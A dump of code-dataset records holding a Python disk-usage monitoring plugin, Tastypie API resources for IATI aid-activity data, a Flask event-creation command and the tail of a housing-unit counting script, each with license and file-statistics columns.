if len(row['properties']['SSL']) == 8:
square = row['properties']['SSL'][:4]
lot = row['properties']['SSL'][4:]
else:
square, lot = row['properties']['SSL'].split()
suffix = ' '
if len(square) > 4:
square = square[:4]
suffix = square[-1]
mar_return = mar_api.get_data(square, lot, suffix)
''' Count the housing units and bedrooms '''
num_units = 0
if row['properties']['NUM_UNITS']: num_units = row['properties']['NUM_UNITS']
if num_units == 0:
num_units = 1
bedrm = row['properties']['BEDRM']
if bedrm == 0: bedrm = 1
if bedrm == None: bedrm = 0
for zone in zone_types:
if zone == 'anc': zone_count = anc_count
elif zone == 'census_tract': zone_count = census_count
elif zone == 'neighborhood_cluster': zone_count = cluster_count
elif zone == 'ward': zone_count = ward_count
elif zone == 'zip': zone_count = zipcode_count
if 'Warning' not in mar_return.keys():
flag = False
for dictionary in zone_count: #dictionary is {'zone_type': 'ANC', 'zone': 'ANC 8A', etc.}
if dictionary['zone'] == mar_return[zone]: #mar_return[ANC] is 'ANC 8A'
dictionary['housing_unit_count'] += num_units
dictionary['bedroom_unit_count'] += bedrm
flag = True
break
if not flag:
zone_count.append( OrderedDict([('zone_type', zone), ('zone', mar_return[zone]), ('housing_unit_count', num_units), ('bedroom_unit_count', bedrm)]) )
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
print(exc_type, "line", exc_tb.tb_lineno)
print("Error! SSL: ", row['properties']['SSL'], row['properties']['AYB'])
continue
return {'anc': anc_count, 'census_tract': census_count, 'neighborhood_cluster': cluster_count, 'ward': ward_count, 'zip': zipcode_count}
def get_csv(self):
"""
Takes the returned dictionary from get_data() and convert the information
into csv file and then save the csv file in
housing-insights/data/processed/zoneUnitCount
as zoneUnitCount_2017-05-30.csv.
"""
if not os.path.exists('../../../data/processed/zoneUnitCount'):
os.makedirs('../../../data/processed/zoneUnitCount')
data_processed_zoneUnitCount = os.path.join(PYTHON_PATH, os.pardir, 'data', 'processed', 'zoneUnitCount')
zone_data = self.get_data()
toCSV = []
date = datetime.date.today().strftime('%Y-%m-%d')
filename = os.path.join(data_processed_zoneUnitCount, 'zoneUnitCount_'+date+'.csv')
for key, value in zone_data.items():
toCSV.extend(value)
keys = toCSV[0].keys()
with open(filename, 'w') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(toCSV)
if __name__ == '__main__':
# Pushes everything from the logger to the command line output as well.
my_api = CamaApiConn()
csvfile = my_api.get_csv()
|
mit
| -8,037,650,862,094,938,000
| 38.425339
| 177
| 0.553655
| false
| 4.050674
| false
| false
| false
|
pmalczuk/python_scripts
|
disk.py
|
1
|
7360
|
#!/usr/bin/python2
import os, sys
import getopt, datetime
import platform
#automatyczne przeliczenie wartosci od Bajtow w gore
def GetHumanReadable(size,precision=2):
suffixes=['B','KB','MB','GB','TB']
suffixIndex = 0
while size > 1024 and suffixIndex < 3:
suffixIndex += 1 #increment the index of the suffix
size = size/1024.0 #apply the division
return "%.*f%s"%(precision,size,suffixes[suffixIndex])
#sprawdzenie punktu montowania
def getmount(path):
path = os.path.realpath(os.path.abspath(path))
if path == '/boot/efi':
return path
while path != os.path.sep:
if os.path.ismount(path):
return path
path = os.path.abspath(os.path.join(path, os.pardir))
return path
#parametry uzycia dyskow zwracane w formie dictionary
def disk_usage(path):
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
used_percent=float(used)/total*100
itotal = st.f_files
ifree = st.f_ffree
iused = st.f_files - st.f_ffree
try: iused_percent=float(iused)/itotal*100
except:
iused_percent=1
return {path: {'total': total,'used': used,'free': free,'used_percent': used_percent, 'itotal': itotal,'ifree': ifree,'iused_percent': iused_percent, 'iused': iused}}
#usuwanie duplikatow w liscie
def make_unique(original_list):
unique_list = []
[unique_list.append(obj) for obj in original_list if obj not in unique_list]
return unique_list
def usage():
print """python check_disk.py -p [--partition=] -w [--warning=] -c [--critical] -C [--icritical] -W [--iwarning] -m [--megabytes] --gwarning --gcritical
Przyklad:
./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -w 11 -c 22 -p /opt -p /var -p /var/log -p /var/log/audit -W 10 -C 5
Trzeba pamietac zeby progi dawac od razu przy danym fs od lewej do prawej tzn.
./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>>> to jest poprawne
./check_disk.py -p / -w 10 -c 20 -p /boot -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>> to jest nie poprawne
"""
sys.exit()
def main():
partitions_args=[]
warnings_args=[]
criticals_args=[]
mega=0
try:
opts, args = getopt.getopt(sys.argv[1:], 'hw:c:p:W:C:m',
['help','warning=','critical=','partition=','iwarning=','icritical=','megabytes','gwarning=','gcritical='])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-w", "--warning"):
warnings_args.append(int(arg))
elif opt in ("-c", "--critical"):
criticals_args.append(int(arg))
elif opt in ("-p", "--partition"):
partitions_args.append(arg)
elif opt in ("-W", "--iwarning"):
iwarning=int(arg)
elif opt in ("-C", "--icritical"):
icritical=int(arg)
elif opt in ("-m", '--megabytes'):
mega=1
elif opt in ('--gwarning'):
gwarn=int(arg)
elif opt in ('--gcritical'):
gcrit=int(arg)
else:
usage()
part_result=[]
new_warning=[]
new_critical=[]
part_not_distinct=[]
for partition in partitions_args:
part_not_distinct.append(getmount(partition)) # sprawdzenie punktow montowania podanych partycji
part_distinct=make_unique(part_not_distinct) #usuwanie duplikatow punktow montowania
for mountpoint in part_distinct:
part_result.append(disk_usage(mountpoint)) #sprawdzenie zajetosci per istniejacy punkt montowania
#print warnings_args[partitions_args.index(mountpoint)]
try:
new_warning.append(warnings_args[part_distinct.index(mountpoint)]) # ustalenie progow warning
new_critical.append(criticals_args[part_distinct.index(mountpoint)]) # ustalenie progow critical
except IndexError:
new_warning.append(gwarn) # ustalenie progow global warning
new_critical.append(gcrit) # ustalenie progow global critical
perfdata=""
outputOK=""
outputWARN=""
outputCRIT=""
outputINODE=""
i=0
crit=0
warn=0
try: gwarn,gcrit
except NameError as e:
pass
#wyswietlanie i wyliczanie
if mega == 0: #procent used
for element in part_result:
for tag,value in element.items():
p_used=value['used_percent']
if p_used > float(new_critical[i]):
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif p_used > float(new_warning[i]):
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
#sprawdzenie inode used
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
warn=1
warning=float(new_warning[i])/100*value['total']/1024
critical=float(new_critical[i])/100*value['total']/1024
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+format(warning,'.0f')+";"+format(critical,'.0f')+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
elif mega == 1: #megabajty used
for element in part_result:
for tag,value in element.items():
used=value['used']/1024/1024
if used < new_critical[i]:
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif used < new_warning[i]:
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
#sprawdzenie inode used
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
warn=1
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+str(new_warning[i]*1024)+";"+str(new_critical[i]*1024)+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
if crit==1:
print "DISK CRITICAL Free Space "+outputCRIT+" "+outputINODE+"| "+perfdata
sys.exit(2)
elif warn==1:
print "DISK WARNING Free Space "+outputWARN+" "+outputINODE+"| "+perfdata
sys.exit(1)
else:
print "DISK OK Free Space "+outputOK+"| "+perfdata
sys.exit(0)
if __name__ == '__main__':
main()
|
gpl-3.0
| -220,261,891,489,609,950
| 37.736842
| 170
| 0.56019
| false
| 3.44086
| false
| false
| false
|
tokatikato/OIPA
|
OIPA/api/v3/resources/activity_view_resources.py
|
1
|
12434
|
# Tastypie specific
from tastypie import fields
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.resources import ModelResource
# Data specific
from api.cache import NoTransformCache
from iati.models import ContactInfo, Activity, Organisation, AidType, FlowType, Sector, CollaborationType, \
TiedStatus, Transaction, ActivityStatus, Currency, OrganisationRole, ActivityScope, \
ActivityParticipatingOrganisation, Location, Result
from api.v3.resources.helper_resources import TitleResource, DescriptionResource, FinanceTypeResource, \
ActivityBudgetResource, DocumentResource, WebsiteResource, PolicyMarkerResource, OtherIdentifierResource
from api.v3.resources.advanced_resources import OnlyCountryResource, OnlyRegionResource
# cache specific
from django.http import HttpResponse
from cache.validator import Validator
from api.v3.resources.csv_serializer import CsvSerializer
from api.api_tools import comma_separated_parameter_to_list
from api.paginator import NoCountPaginator
class ActivityViewAidTypeResource(ModelResource):
class Meta:
queryset = AidType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewFlowTypeResource(ModelResource):
class Meta:
queryset = FlowType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewSectorResource(ModelResource):
class Meta:
queryset = Sector.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewCollaborationTypeResource(ModelResource):
class Meta:
queryset = CollaborationType.objects.all()
include_resource_uri = False
excludes = ['description', 'language']
class ActivityViewTiedStatusResource(ModelResource):
class Meta:
queryset = TiedStatus.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewOrganisationRoleResource(ModelResource):
class Meta:
queryset = OrganisationRole.objects.all()
include_resource_uri = False
class ActivityViewOrganisationResource(ModelResource):
organisation_role = fields.ForeignKey(ActivityViewOrganisationRoleResource, 'organisation_role', full=True, null=True)
class Meta:
queryset = Organisation.objects.all()
include_resource_uri = False
excludes = ['abbreviation', 'reported_by_organisation']
filtering = {
'iati_identifier': 'exact',
'code': ALL_WITH_RELATIONS
}
class ActivityViewTransactionResource(ModelResource):
provider_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'provider_organisation', full=True, null=True)
receiver_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'receiver_organisation', full=True, null=True)
class Meta:
queryset = Transaction.objects.all()
include_resource_uri = False
excludes = ['id', 'ref', 'description', 'provider_activity']
allowed_methods = ['get']
def dehydrate(self, bundle):
bundle.data['disbursement_channel'] = bundle.obj.disbursement_channel_id
bundle.data['currency'] = bundle.obj.currency_id
bundle.data['tied_status'] = bundle.obj.tied_status_id
bundle.data['transaction_type'] = bundle.obj.transaction_type_id
return bundle
class ActivityViewParticipatingOrganisationResource(ModelResource):
organisation = fields.ToOneField(ActivityViewOrganisationResource, 'organisation', full=True, null=True)
class Meta:
queryset = ActivityParticipatingOrganisation.objects.all()
include_resource_uri = False
excludes = ['id']
filtering = {
'organisation': ALL_WITH_RELATIONS
}
def dehydrate(self, bundle):
bundle.data['role_id'] = bundle.obj.role_id
bundle.data['code'] = bundle.obj.organisation_id
return bundle
class ActivityViewActivityStatusResource(ModelResource):
class Meta:
queryset = ActivityStatus.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewActivityScopeResource(ModelResource):
class Meta:
queryset = ActivityScope.objects.all()
include_resource_uri = False
class ActivityViewCurrencyResource(ModelResource):
class Meta:
queryset = Currency.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewContactInfoResource(ModelResource):
class Meta:
queryset = ContactInfo.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityLocationResource(ModelResource):
class Meta:
queryset = Location.objects.all()
include_resource_uri = False
excludes = ['id', 'activity_description', 'adm_code', 'adm_country_adm1', 'adm_country_adm2',
'adm_country_name', 'adm_level', 'gazetteer_entry', 'location_id_code', 'point_srs_name',
'ref', 'type_description', 'point_pos']
class ActivityResultResource(ModelResource):
class Meta:
queryset = Result.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityResource(ModelResource):
countries = fields.ToManyField(OnlyCountryResource, 'recipient_country', full=True, null=True, use_in='all')
regions = fields.ToManyField(OnlyRegionResource, 'recipient_region', full=True, null=True, use_in='all')
sectors = fields.ToManyField(ActivityViewSectorResource, 'sector', full=True, null=True, use_in='all')
titles = fields.ToManyField(TitleResource, 'title_set', full=True, null=True, use_in='all')
descriptions = fields.ToManyField(DescriptionResource, 'description_set', full=True, null=True, use_in='all')
participating_organisations = fields.ToManyField(ActivityViewOrganisationResource, 'participating_organisation', full=True, null=True, use_in='all')
reporting_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'reporting_organisation', full=True, null=True, use_in='detail' )
activity_status = fields.ForeignKey(ActivityViewActivityStatusResource, 'activity_status', full=True, null=True, use_in='detail')
websites = fields.ToManyField(WebsiteResource, 'activity_website_set', full=True, null=True, use_in='detail')
policy_markers = fields.ToManyField(PolicyMarkerResource, 'policy_marker', full=True, null=True, use_in='detail')
collaboration_type = fields.ForeignKey(ActivityViewCollaborationTypeResource, attribute='collaboration_type', full=True, null=True, use_in='detail')
default_flow_type = fields.ForeignKey(ActivityViewFlowTypeResource, attribute='default_flow_type', full=True, null=True, use_in='detail')
default_finance_type = fields.ForeignKey(FinanceTypeResource, attribute='default_finance_type', full=True, null=True, use_in='detail')
default_aid_type = fields.ForeignKey(ActivityViewAidTypeResource, attribute='default_aid_type', full=True, null=True, use_in='detail')
default_tied_status = fields.ForeignKey(ActivityViewTiedStatusResource, attribute='default_tied_status', full=True, null=True, use_in='detail')
activity_scope = fields.ForeignKey(ActivityViewActivityScopeResource, attribute='scope', full=True, null=True, use_in='detail')
default_currency = fields.ForeignKey(ActivityViewCurrencyResource, attribute='default_currency', full=True, null=True, use_in='detail')
budget = fields.ToManyField(ActivityBudgetResource, 'budget_set', full=True, null=True, use_in='detail')
transactions = fields.ToManyField(ActivityViewTransactionResource, 'transaction_set', full=True, null=True, use_in='detail')
documents = fields.ToManyField(DocumentResource, 'documentlink_set', full=True, null=True, use_in='detail')
other_identifier = fields.ToManyField(OtherIdentifierResource, 'otheridentifier_set', full=True, null=True, use_in='detail')
locations = fields.ToManyField(ActivityLocationResource, 'location_set', full=True, null=True, use_in='all')
results = fields.ToManyField(ActivityResultResource, 'result_set', full=True, null=True, use_in='detail')
# to add:
# conditions
# contact
# country-budget?
# crsadd
# disbursement channel?
# ffs
# ffs forecast?
# planned disbursement
# related activity
# verification status
# vocabulary?
class Meta:
queryset = Activity.objects.all()
resource_name = 'activities'
max_limit = 1000
serializer = CsvSerializer()
excludes = ['date_created']
ordering = ['start_actual', 'start_planned', 'end_actual', 'end_planned', 'sectors', 'total_budget']
filtering = {
'iati_identifier': 'exact',
'start_planned': ALL,
'start_actual': ALL,
'end_planned': ALL,
'end_actual': ALL,
'total_budget': ALL,
'sectors': ('exact', 'in'),
'regions': ('exact', 'in'),
'countries': ('exact', 'in'),
'reporting_organisation': ('exact', 'in'),
'documents': ALL_WITH_RELATIONS
}
cache = NoTransformCache()
paginator_class = NoCountPaginator
def apply_filters(self, request, applicable_filters):
activity_list = super(ActivityResource, self).apply_filters(request, applicable_filters).prefetch_related('title_set').prefetch_related('description_set')
query = request.GET.get('query', None)
filter_year_param = request.GET.get('start_year_planned__in', None)
if query:
search_fields = comma_separated_parameter_to_list(request.GET.get('search_fields', None))
activity_list = activity_list.search(query, search_fields)
if filter_year_param:
years = comma_separated_parameter_to_list(filter_year_param)
activity_list = activity_list.filter_years(years)
return activity_list.distinct_if_necessary(applicable_filters)
def full_dehydrate(self, bundle, for_list=False):
#If the select_fields param is found, run this overwritten method.
#Otherwise run the default Tastypie method
select_fields_param = bundle.request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
for field_name, field_object in self.fields.items():
#If the field_name is in the list of requested fields dehydrate it
if (field_name) in select_fields:
# A touch leaky but it makes URI resolution work.
if getattr(field_object, 'dehydrated_type', None) == 'related':
field_object.api_name = self._meta.api_name
field_object.resource_name = self._meta.resource_name
bundle.data[field_name] = field_object.dehydrate(bundle, for_list=for_list)
# Check for an optional method to do further dehydration.
method = getattr(self, "dehydrate_%s" % field_name, None)
if method:
bundle.data[field_name] = method(bundle)
bundle = self.dehydrate(bundle)
return bundle
else:
return super(ActivityResource, self).full_dehydrate(bundle, for_list)
def get_list(self, request, **kwargs):
# check if call is cached using validator.is_cached
# check if call contains flush, if it does the call comes from the cache updater and shouldn't return cached results
validator = Validator()
cururl = request.META['PATH_INFO'] + "?" + request.META['QUERY_STRING']
if not 'flush' in cururl and validator.is_cached(cururl):
return HttpResponse(validator.get_cached_call(cururl), mimetype='application/json')
else:
return super(ActivityResource, self).get_list(request, **kwargs)
def alter_list_data_to_serialize(self, request, data):
select_fields_param = request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
data['meta']['selectable_fields'] = {f[0] for f in self.fields.items()} - {f for f in select_fields}
return data
|
agpl-3.0
| 9,049,514,736,130,169,000
| 43.24911
| 162
| 0.687309
| false
| 4.066056
| false
| false
| false
|
PyGotham/pygotham
|
pygotham/manage/events.py
|
1
|
1920
|
"""Event-related management commands."""
import sys
import arrow
from flask import current_app
from flask_script import Command, prompt, prompt_bool
from werkzeug.datastructures import MultiDict
from pygotham.core import db
from pygotham.forms import EventForm
from pygotham.models import Event
class CreateEvent(Command):
"""Management command to create an :class:`~pygotham.models.Event`.
In addition to asking for certain values, the event can also be
activated.
"""
def run(self):
"""Run the command."""
# Get the information.
name = prompt('Name')
slug = prompt('Slug (optional)')
begins = prompt('Event start date (YYYY-MM-DD)')
ends = prompt('Event end date (YYYY-MM-DD)')
proposals_begin = prompt('CFP start date (YYYY-MM-DD HH:MM:SS)')
active = prompt_bool('Activate the event')
data = MultiDict({
'name': name,
'slug': slug,
'begins': begins,
'ends': ends,
'proposals_begin': proposals_begin,
'active': active,
})
# Validate the form.
form = EventForm(data, csrf_enabled=False)
if form.validate():
# Save the new event.
event = Event()
form.populate_obj(event)
if event.active:
now = arrow.utcnow().to(current_app.config['TIME_ZONE']).naive
event.activity_begins = now
db.session.add(event)
db.session.commit()
print('\nEvent created successfully.')
print('Event(id={} slug={} name={})'.format(
event.id, event.slug, event.name))
return event
# If something went wrong, report it and exit out.
print('\nError creating event:')
for errors in form.errors.values():
print('\n'.join(errors))
sys.exit(1)
|
bsd-3-clause
| -2,552,559,807,039,151,000
| 28.538462
| 78
| 0.578125
| false
| 4.201313
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.